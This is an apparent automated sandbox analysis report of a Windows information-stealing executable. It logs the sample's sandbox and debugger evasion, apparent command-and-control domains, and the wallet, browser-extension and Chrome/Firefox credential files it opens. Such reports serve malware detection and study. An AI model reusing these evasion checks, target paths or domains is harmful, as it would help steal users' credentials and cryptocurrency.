              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330B5C second address: 5330B78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD048h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330B78 second address: 5330B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F88DD0CB155h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330B9F second address: 5330BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD041h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F88DC6CD03Ah 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330BC3 second address: 5330C30 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F88DD0CB152h 0x00000008 or ecx, 66B91A18h 0x0000000e jmp 00007F88DD0CB14Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx ecx, bx 0x00000019 popad 0x0000001a cmp dword ptr [76C8459Ch], 05h 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F88DD0CB151h 0x00000028 xor al, FFFFFFB6h 0x0000002b jmp 00007F88DD0CB151h 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 call 00007F88DD0CB14Eh 0x00000038 pop esi 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330C30 second address: 5330C62 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F88DC6CD03Bh 0x00000008 jmp 00007F88DC6CD043h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 je 00007F894DFBADE0h 0x00000017 pushad 0x00000018 pushad 0x00000019 movzx ecx, bx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330C62 second address: 5330C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov di, 2750h 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F88DD0CB151h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330C82 second address: 5330C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330C86 second address: 5330C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330E2C second address: 5330E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-1Ch], esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F88DC6CD044h 0x00000013 xor si, CCE8h 0x00000018 jmp 00007F88DC6CD03Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F88DC6CD046h 0x00000026 or ecx, 49A1DF48h 0x0000002c jmp 00007F88DC6CD03Bh 0x00000031 popfd 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5330E90 second address: 5330E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340A4E second address: 5340A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340A54 second address: 5340A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340A58 second address: 5340A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD043h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F88DC6CD045h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340A89 second address: 5340A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 15F9CDA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340A93 second address: 5340ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 movzx ecx, bx 0x0000000c mov eax, edi 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F88DC6CD043h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F88DC6CD045h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340ACF second address: 5340AD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340BF6 second address: 5340CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 pushfd 0x00000007 jmp 00007F88DC6CD049h 0x0000000c and eax, 04FB6E86h 0x00000012 jmp 00007F88DC6CD041h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b je 00007F894DFC289Ch 0x00000021 pushad 0x00000022 push ecx 0x00000023 pushfd 0x00000024 jmp 00007F88DC6CD043h 0x00000029 adc ah, FFFFFFBEh 0x0000002c jmp 00007F88DC6CD049h 0x00000031 popfd 0x00000032 pop esi 0x00000033 pushfd 0x00000034 jmp 00007F88DC6CD041h 0x00000039 add si, 57F6h 0x0000003e jmp 00007F88DC6CD041h 0x00000043 popfd 0x00000044 popad 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 pushad 0x00000048 mov si, 8A39h 0x0000004c push ecx 0x0000004d pop edx 0x0000004e popad 0x0000004f push eax 0x00000050 push edx 0x00000051 mov edx, eax 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340CA3 second address: 5340CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340CA7 second address: 5340CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F88DC6CD043h 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340CC9 second address: 5340CE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340CE4 second address: 5340CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DC6CD044h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: 5340CFC second address: 5340D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSpecial instruction interceptor: First address: D57BC0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSpecial instruction interceptor: First address: D57CA4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSpecial instruction interceptor: First address: D57BEB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSpecial instruction interceptor: First address: F0394D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSpecial instruction interceptor: First address: D554D6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSpecial instruction interceptor: First address: F0C649 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSpecial instruction interceptor: First address: F8E4E5 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe TID: 7952Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe TID: 7948Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634665470.0000000000EE5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: QQ5BxgG5G6.exe, QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001579000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1580314108.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1557463856.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634379503.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000002.1635616126.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000002.1635508382.0000000001579000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579492722.00000000015AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1580314108.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1557463856.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634379503.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000002.1635616126.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579492722.00000000015AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnP
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634665470.0000000000EE5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1509449582.0000000005CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: SICE
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: steppriflej.xyz
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sendypaster.xyz
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634582478.0000000000D01000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: cuddlyready.xyz
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634665470.0000000000EE5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: o`&'XProgram Manager
              Source: QQ5BxgG5G6.exe, 00000000.00000002.1634665470.0000000000EE5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: `&'XProgram Manager
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: QQ5BxgG5G6.exe, QQ5BxgG5G6.exe, 00000000.00000003.1580207567.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1580314108.00000000015AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: QQ5BxgG5G6.exe PID: 7792, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: QQ5BxgG5G6.exeString found in binary or memory: Wallets/Electrum
              Source: QQ5BxgG5G6.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
              Source: QQ5BxgG5G6.exeString found in binary or memory: Jaxx Liberty
              Source: QQ5BxgG5G6.exeString found in binary or memory: window-state.json
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1557425029.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1557425029.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: QQ5BxgG5G6.exeString found in binary or memory: %appdata%\Ethereum
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1557531889.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: QQ5BxgG5G6.exe, 00000000.00000003.1557531889.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
